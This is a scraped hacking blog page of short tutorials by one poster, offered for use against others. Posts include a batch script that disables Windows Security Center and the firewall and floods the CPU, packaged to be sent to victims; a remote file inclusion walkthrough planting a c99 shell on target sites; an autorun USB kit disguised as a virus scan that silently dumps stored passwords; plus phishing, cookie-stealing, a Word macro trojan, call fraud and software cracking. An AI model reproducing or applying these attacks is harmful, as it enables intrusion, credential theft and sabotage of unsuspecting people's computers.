Latest Exploits

Make Free Calls Worldwide

Posted by Sahil™ on , under , | comments (0)



First go to:
INSTALL

After it is fully installed, open friend caller from desktop. Then register.


-


Better to you temp mails like mailinator,eyepaste,yopmail etc ;)

Now go to your email and confirm your account and you will be credited $ 0.10 for free calls. So you can only call for 10 seconds for free but this what I made this tut so you can call free.

Now login.



Then click on phone Icon.



Now open cheat engine. [ Download it from http://u.bb/QK]

Now click on open process.



Then click on window list.



Then select friend caller. And open it.




Now dial number in friend caller. [First test your own number] and click call.



Now it will start ringing:.



Now in cheat engine, enable speed hack. Edit speed to 0.00

If you have any query, comment below.

Create Undetectable Batch File

Posted by Sahil™ on , under | comments (0)



Hello,this is a tutorial showing you how to make a batch file undetectable.
First,if you want to make your way thru the computer and not be seen or something,easiest way is to shutdown all firewalls/security.
To do that you have to type in the following inside Notepad:

Code:
@echo off
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable

hat will stop the Security Center
Shared Access and Firewall.

Save the file as something.bat

But this will probably fail because when the AV detects that it is a batch file it will automatically delete it.
So What to do?

Exe:

Download nBinder Pro:
http://www.midload.com/en/file/29192/nbinder-rar

mirror
http://rapidshare.com/files/109795148/nbinder.rar

pass: linkzshare.net

NBinder pro is a Binder/Converter/Icon Changer

Download,and open.
Click Add..
And add the batch file.
Then you can bind it with self.
By simply clicking Bind.
That will convert the batch to .exe
And then you change the icon.


Com:
Download:
Bat2COM
And convert it.

When it is converted,send it to someone,and when he runs it he will see nothing,but a cmd window open and close.
But what he doesn't see is that his firewall,security has closed.

Now,to make the batch a little more dangerous.


Code:
@echo off
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
echo shutdown -s >> "%systemdrive%\documents and settings\start menu\programs\startup\virus.bat"
:virus
start cmd.exe
start command.com
start mspaint.exe
goto :virus

So basically shuts down all security.
Makes a new batch file at startup which inside is the command shutdown -s
Then starts cmd.exe command.com and mspaint.exe multiple,multiple times.
Watch the CPU usage go up.

Hack websites using Remote file inlcusion

Posted by Sahil™ on , under | comments (0)



I receive many E-mails on How To Hack websites so,  today I will demonstrate how hackers use remote file inlcusion to deface websites.

Requirements
C99 shell

First of all visit google and type
"index.php?page="

This will show all the pages which have index.php?page=" in their url, RFI vulnerabilities only work on those sites which have index.php?page= in their url.

Now lets say that the website is as follows:

www.targetsite.com/index.php?page=something

so to check the vulnerability we will replace the something to Google or any other site now if Google homepage shows up this means that the website is vulnerable to the attack.The url will look like

 www.targetsite.com/index.php?page=www.google.com


Once we know that the website is vulnerable to the attack we will now include the c99 shell.To do it download the c99 shell and then upload it to a webhosting site such as Ripway.com or 110mb.com


Once the shell is uploaded you will have a unique url for your shell lets say it is

www.webhostingsite.com/c99.txt

Now to execute the shell in order to gain access to the website we will do as follows

http://www.targetsite.com%2Findex.php%3Fpage%3Dwww.webhostingsite.com%2Fc99.txt%3F

Dont forgett the "?" or else it wont be executed.

Remeber this does not work on all websites so the key is to try and try and try and try!

XSS Shell v0.3.9 – Cross Site Scripting Backdoor Tool

Posted by Sahil™ on , under | comments (0)




XSS Shell is a powerful XSS backdoor which allows interactively getting control over a Cross-site Scripting (XSS) vulnerability in a web application. Demonstrates the real power and damage of Cross-site Scripting attacks.

10 Tricks to Xploit SQL Sites

Posted by Sahil™ on , under | comments (0)



Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.testing

Earn $45 per month. Guaranteed.

Posted by Sahil™ on , under | comments (0)




EARN $45 PER MONTH. GUARANTEED.                                                            

Get Paid Stuffs For Free Using Black Hat SEO Technique.

Posted by Sahil™ on , under | comments (1)



             I am going to show you how you can download almost anything for FREE. This technique does not include torrents or Lime Wire or anything like that, it includes black hat SEO technique on Google. You may think to yourself there is no way that Google can be hacked but you would be very wrong. There is a way to hack Google and download almost anything.

Earn more than $765 per month!!!

Posted by Sahil™ on , under | comments (0)



 
Earn More Than $765 Per Month                                                                 

My SOLiDumper worth $50 cracked!!!

Posted by Sahil™ on , under | comments (0)





Requirements:
.Net Framework 3.5
DOWNLOAD FROM HERE:
http://www.ziddu.com/download/8760628/MySQLiDumper.rar.html

Screen shots:

Hack Computers using Cain and Abel

Posted by Sahil™ on , under , | comments (0)



 

Cain and Abel (sometimes called simply "Cain") is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain and Abel. Cain and Abel is maintained by Massimiliano Montoro.

Protect your blog post from being copied.

Posted by Sahil™ on , under , | comments (0)



You must have noticed that most of blogger sites have disabled copy paste and right click function, so that their hard work on writing blog cannot be copied by others.
Here's the trick to use this function.

For disabling copy paste function:
>Login to ur blogger
>Layout
>Edit HTML
>Search (ctrl+f) for the head tag.
 >Just below this tag copy paste this script:

Get IP logs using image file.

Posted by Sahil™ on , under , , | comments (0)




Step 1:
Register for a free web hosting site at
www.x10hosting.com or www.0fees.net.

Step 2:
Upload the image file that you want to sent or display to your friend.

Hack Passwords using USB Drive

Posted by Sahil™ on , under | comments (0)



Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friends/college Computer.
We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.


IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
____________________________________________________________________________
Here is a step by step procedre to create the password hacking toolkit:

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
Click here to download tools.

2. Create a new Notepad and write the following text into it:


[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text document.txt to autorun.inf

Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it:


start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friends PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you'll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Shutdown a PC forever !!!

Posted by Sahil™ on , under | comments (0)





Open up notepad and copy , paste the code below. Save it as a .bat file.




Goolag: Google Database Scanner

Posted by Sahil™ on , under , | comments (0)




Goolag Scanner is an automated "Google hacking" application that has been banned by google. This Scanner was itself used by the google employees to find website vulnerabilites. As this great software was leaked out by hackers google banned it from further use. Google hacking is a form of Web site auditing that takes advantage of "dorks," or extended search queries, that look for very specific kinds of data (credit card information, mp3 files, passwords, IP configuration data, etc.).

How To Find Free Porn Passes

Posted by Sahil™ on , under | comments (0)



This summary is not available. Please click here to view the post.

Make a MS Word Trojan

Posted by Sahil™ on , under | comments (0)



Anyway this is how you can use metasploit to make a vbs reverse meterpreter payload and import it into a Microsoft Word as a macro. It's super easy.


download and install metasploit
http://www.metasploit.com/

-----------------------------------------------------------------
Ok first we create the payload with msfpayload

Easy Hacking using Metasploit

Posted by Sahil™ on , under | comments (0)



Today,I am going to make a tutorial on Metasploit.

It is a great tool and it can be downloaded from:
http://www.metasploit.com/

The best thing is it is available for everyone for free.

It is very easy to use and I am going to show you now.

Hacking hosting sites using PHP Jackal

Posted by Sahil™ on , under | comments (1)



Download PHP Jackal From Here

http://www.ziddu.com/download/8407467/PHPJackal.zip.html
extract files

Upload It On Your host Like If u Wanna Hack A justfree Page Upload it On Your JustFree Account or you want to hack my3gb so upload in my3gb

Cookie Stealer In Fake Page

Posted by Sahil™ on , under | comments (0)



Use This Run.php File In Fake Page

http://www.ziddu.com/download/8407239/Run.rar.html

And The Cookie And Login Details Will BE Saved In ld.txt

99 ways to make your computer blazingly fast

Posted by Sahil™ on , under | comments (0)




Over the last several years working in IT for various companies as a Systems Administrator, Network Administrator, and Help Desk professional, I’ve written and learned about many ways to increase the performance of not only my PC, but also of the many PCs on my networks ranging from Windows 98 to Windows Vista.

Increase your Internet speed.

Posted by Sahil™ on , under | comments (0)





Are you a power-user with 5 minutes to spare? Do you want a faster internet experience?

Try out namebench. It hunts down the fastest DNS servers available for your computer to use. namebench runs a fair and thorough benchmark using your web browser history, tcpdump output, or standardized datasets in order to provide an individualized recommendation. namebench is completely free and does not modify your system in any way. This project began as a 20% project at Google.

GomezPeer- Ultimate Money Making Method

Posted by Sahil™ on , under | comments (0)








What is GomezPEER?

The Gomez PEER is a secure, Java-based application that runs in the background of your PC. You may even forget it's there, because it will not disrupt the way you use your computer.

Using advanced, peer-to-peer distributed computing technology, the Gomez PEER combines the spare capacity of PCs around the world to measure the performance of Web sites. After you install the Gomez PEER, it will periodically communicate with Gomez servers via the Internet, signal that it's available for work, and request a work unit. And you will be credited for your online time and work processed approximately every 15 minutes that the application is running.

867 Hacking Video Tutorials

Posted by Sahil™ on , under | comments (0)


Phishing- The most common way.

Posted by Sahil™ on , under | comments (0)





Download this RAR first
http://www.megaupload.com/?d=UE64AM68

then make an account on www.justfree.com
(note: the account name should be securedgmail.justfree.com or securedymail.justfree.com. Depends on the email id you want to hack (gmail, yahoo, live....))

then login to ur account and go to file manager

Hacking websites using SQL Helper.

Posted by Sahil™ on , under | comments (0)



Well as we know the term sql injection is the term which we use to hack web sites but for that we must know the some codes exploits and issue in web sites for that we have to spent lots of time on that moreover we must have good knwoledge of sql database too
but if any body dnt know the sql and how to inject the site with in sql i have an option for that kinda innocent people liek me lol
anyway just on the start up of my post i just wanna say we can hack and inject any site with out involving in the hard coding and etc with the help of sql helper

Here We Start :-

Keyloggers: Detailed Tutorial.

Posted by Sahil™ on , under | comments (0)





I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go…

Quick Guide to Hacking

Posted by Sahil™ on , under | comments (0)



A very quick guide to learn hacking follow the links and you will surely learn alot of things


Well, first up, you will have to read up on alot of things like:
Cryptography
Brute Forcing
Dictionary Attacks
Sniffing
Telnet
FTP
Gopher
TCP/IP and Protocols

Hack Bux.to (Money Making Online)

Posted by Sahil™ on , under | comments (0)



At Bux.to, you get paid to click on ads and visit websites. The process is easy! You simply click a link and view a website for 30 seconds to earn money. You can earn even more by referring friends. You'll get paid $0.01 for each website you personally view and $0.01 for each website your referrals view.

Disable Navbar in Blogger

Posted by Sahil™ on , under | comments (0)



Navbar is the task bar of Blogger to promote their Web. To disable a Navbar in Blogger or Blogspot it is very simple. You hate the Navbar because you like to have a private blog and not to have others interference.
To disable a Navbar follow the following simple and easy steps:


Get Orkut scraps as SMS.

Posted by Sahil™ on , under | comments (0)



This orkut trick can be done by converting all your scraps into a feed.Associate that feed with a Google SMS channel. When someone makes a scraps in your scrapbook, your scrapbook feed will receive and store that scrap. Google SMS channel checks scrapbook feed periodically and will send you the scrap by SMS once it find a new scrap in your feed.

I will make it a bit more simple. Follow the below steps.

5Tricks to download any book from google.

Posted by Sahil™ on , under | comments (0)



Trick1:
I don’t know if google would like this, but it is, definitely, not a hack. This is just teaching you how to copy the files that google temporarily saved in your computer before showing it to you through internet browser.
Just follow the steps bellow;
1. Open your internet Explorer (Not Firefox). Make sure that you are the admin of your computer. Then, go to the page in books.google.com that you want to download.
2. Now, go to “C:\Documents and Settings\%your admin name%\Local Settings\Temporary Internet Files\” of your computer. Delete all of the content of that folder

3. In your internet Explorer, refresh the page and browse-thru the pages of the books that you want to download. 
4. Refresh the “Temporary Internet Files” folder. Copy all PNG files to another folder. You can distinguish PNG Files through its icon. These files that you have just copied are, actually, the pages of the books that you have just browsed.

CRACK ANY SOFTWARE

Posted by Sahil™ on , under | comments (0)



In this tutorial you will learn how to crack any type of software protection using W32Dasm and HIEW.

IDENTIFYING THE PROTECTION:
Run the program, game, etc., (SoftwareX) that you want to crack without the CD in the CD reader. SoftwareX will not run of course, however, when the error window pops up it will give you all of the vital information that you need to crack the program, so be sure to write down what it says.

Earn $100/mnth with Google Adsense

Posted by Sahil™ on , under , | comments (0)



Many People Here Wish To Earn Online But Most Of Them Are Just Fake Sites Which Provide Online Earnning. Here Is A Simple And Easy Way To Earn Money Online. Its Not About Increasing Your Referals To Earn Money Or Something Else. You Can Earn Through Google Every Day As Much As You can. Google Is A World Wide Popular Website So They Wont Cheat You. What You Have To Do Is Simply Make A Site And Start Displaying Ads Provided By Google And You Will Start Earning. Many People Know About Google Adsense But Others Do Not Know So Its A Nice Method To Earn Online.
For Those Who Dont Know About This Simply Follow These Steps And You Will Know How To Do This.

1st Step:- Make A Gmail Id

Top 10 virus pranks

Posted by Sahil™ on , under | comments (0)



ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...

--- --- --- --- --- --- --- --- ---

1) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Save it as "Anything.VBS" and send it.

Add Song in Orkut About Me.

Posted by Sahil™ on , under | comments (0)



Step 1: Converting MP3 to SWF


Use mp3 cutter or Total Video Converter to cut ur desired part from mp3 [select bit rate 16kb,so that it will reduces ur mp3 size]
while cutting ur mp3 in mp3 cutter make sure to change
FreQuenCy = 24000Hz n Bitarte=24 kbpS (goto settinG>Mp3)

Download mp3 to swf converter :http://hotfile.com/dl/19429059/cda8dd8/mp3-swf_chandan.zip.html

Locker 2.0

Posted by Sahil™ on , under | comments (0)



Open notepad and copy paste the following coding:

cls
@ECHO OFF
title LOCKER v2.0
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST LOCKER goto MDLOCKER
:CONFIRM
echo